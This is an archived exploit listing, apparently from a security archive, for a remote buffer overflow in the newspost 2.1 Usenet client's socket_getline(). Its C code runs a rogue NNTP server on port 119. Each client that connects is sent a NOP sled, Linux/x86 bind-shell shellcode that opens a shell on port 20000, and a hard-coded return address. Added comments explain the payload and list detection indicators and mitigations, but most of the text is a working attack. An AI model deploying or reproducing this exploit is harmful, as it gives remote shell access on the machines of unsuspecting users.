
newspost.c

newspost.c
Posted Feb 5, 2005
Authored by cybertronic

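Newspost socket_getline() remote buffer overflow exploit. The code runs as a rogue NNTP server on TCP port 119 and sends an oversized response to newspost 2.1 clients that connect to it.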

tags | exploit, remote, overflow
SHA-256 | a6081f4aa3eed364766ff408136678d080d915d86e1294344825ed9ec87208cc

newspost.c

/* 
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit

Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic
<file>

Greetz fly to my girlfriend YASMIN H.


¼
¼M
M ¼MMM
MMm ¼MMMM
M$$MMm ¼MMMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm ´MMMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM´
MMMM$$$MMMMMMMm MMM$$MMM´
`MMMMMMMMMMMMMm MMMMMMM´
`MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
¼MMM#MMMMMMMMMMMMMMMMMMMMm
4MMM<º >MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
¼Mn ¼MMMMMMMMMMMMMMMMMMMMMMMMM ¼Mnn
nM `MMMMMMMMMMMMMMMMMMMMMM´ n¼
`¼ MMMMMMMMMMMMMMMMM¼ n´
MMMMMM¼
mtr¼


mMMM nmM mM
mM¼´ M ' M n
mM$ nM n¼MMn¼Ä
4M m ¼M N ¼ ¼`
m¼ `n¼ mM NM´ NM
mM mMm nm M´¼Mļ n¼Mm ¼n xnÄ, ¼ ¼n xnÄ ¼Mm Mn n¼ nM
nMm
mM `mMM´ nM M nM ,` ¼n´ y M ¼n´ y nM ¼ nM Ä Ä ¼
M¼ M' ¼Ä M n.,´ nm nM nM n M ¼ Ä ¼ n
MM¼ mM M nM Ä M´ n , nM ¼Ä nM M nM M M M´ M
n
MMM¼ M´ nM MÄÄM n¼nN ¼M nM ¼M `¼M´ ´¼ .N nM ¼nM´

n´ cybertronic 2oo5
´ ________________
----------------------/



MMMMMMMMm mMMMMMMM¼
´MM$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM´

ºÕÍÄúú just want to say love you dad! úúÄÍÕº

*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

#define PORT 119
#define BACKLOG 5

/*
 * Payload bytes, described by the author as a 92-byte bind shell on
 * port 20000. It is Linux/x86 code using the int 0x80 system-call gate:
 * al = 102 is socketcall, 63 is dup2, and the two "not al" sequences
 * yield 16 and 11 (execve) without embedding those bytes directly.
 * The operand bytes 4e 20 of the "push word" are port 20000 in network
 * byte order, and the two pushed dwords spell "//bin/sh" in memory
 * order ("//bi" then "n/sh").
 *
 * For defenders: if this runs in a victim process, the visible effects
 * are that process opening a listener on 20000/tcp and then exec'ing a
 * shell with the accepted socket duplicated onto its low descriptors.
 * The byte string itself can be matched in network captures or files.
 */
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h

/* Builds the oversized reply and writes it to an already-connected socket. */
void cmd ( int connfd );
/* Clears the terminal and prints the author's coloured banner. */
void header ();

/*
 * Runs the proof of concept as a listener rather than as a client.
 *
 * Opens a TCP socket, binds it to INADDR_ANY on PORT (119, the NNTP port),
 * then accepts connections forever. Each accepted connection is handed to
 * a forked child, which prints the peer address and calls cmd() on the
 * connected socket. Nothing is read from the peer before cmd() runs, and
 * argc/argv are not used.
 *
 * Exits with status 1 when socket(), listen() or accept() fails.
 */
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;

header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );

/* NOTE(review): the result of bind() is not checked here, unlike socket() and listen(). */
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr )
);
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );

for ( ; ; )
{
clilen = sizeof ( cliaddr );

if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}

if ( ( childpid = fork ( ) ) == 0 )
{
/* Child: it only needs the connected socket, so the listener is closed. */
close ( listenfd );
printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL,
inet_ntoa ( cliaddr.sin_addr ) );
cmd ( connfd );
/*
 * NOTE(review): there is no exit() here, so the child falls through to
 * close(connfd) and loops back to accept() on the listenfd it has
 * already closed; that call is expected to fail and take the exit(1)
 * path above.
 */
}
/* Reached by the parent after fork(), and by the child after cmd() returns. */
close ( connfd );
}
}

/*
 * Builds one oversized reply in out[] and writes it to the connected
 * socket s, then sleeps for one second.
 *
 * Layout of out[], as assembled below:
 *   - 956 bytes of 0x90 filler,
 *   - the scode[] payload (copied with its terminating NUL, which the
 *     strcat() that follows then overwrites),
 *   - four 'A' (0x41) bytes,
 *   - the first four bytes of ret, a hard-coded address (0xbfffecb8).
 *     assumes a 32-bit little-endian build for this to be the whole
 *     value - TODO confirm.
 *
 * The buffer is written with no line terminator and no NNTP status line.
 * The page names newspost's socket_getline() as the affected routine; that
 * code is not shown here, so the exact overflow condition is presumably an
 * unbounded line read into a fixed-size buffer - confirm against the
 * newspost source. For defenders, a reply on 119/tcp that begins with a
 * long run of 0x90 bytes and exceeds 1000 bytes without a newline is a
 * usable network indicator. The fixed address only works with a
 * predictable stack layout, so ASLR and a non-executable stack are the
 * relevant host mitigations, and a length-bounded line read is the
 * client-side fix.
 *
 * Exits with status 1 if write() returns <= 0.
 */
void
cmd ( int s )
{
/* in[] is declared but never used in this function. */
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;

bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof ( scode ) );
/* strcat/strncat append at the first NUL, i.e. directly after the payload bytes. */
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
/* NOTE(review): strlen() returns size_t, while %u expects unsigned int. */
printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out ) );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}

/*
 * Clears the terminal by running "clear" through system(), then prints a
 * multi-colour banner, the author's contact line and the target name
 * "newspost-2.1". It takes no input and returns nothing.
 *
 * NOTE(review): in this copy several string literals are split across
 * lines (for example the one ending the first printf line), which looks
 * like line wrapping introduced when the listing was published.
 */
void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "# #
" GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED " cybertronic@gmx.net\n" NORMAL );
printf ( RED " ----------(c) 2005----------\n\n"
NORMAL );
printf ( "newspost-2.1\n\n" );
}
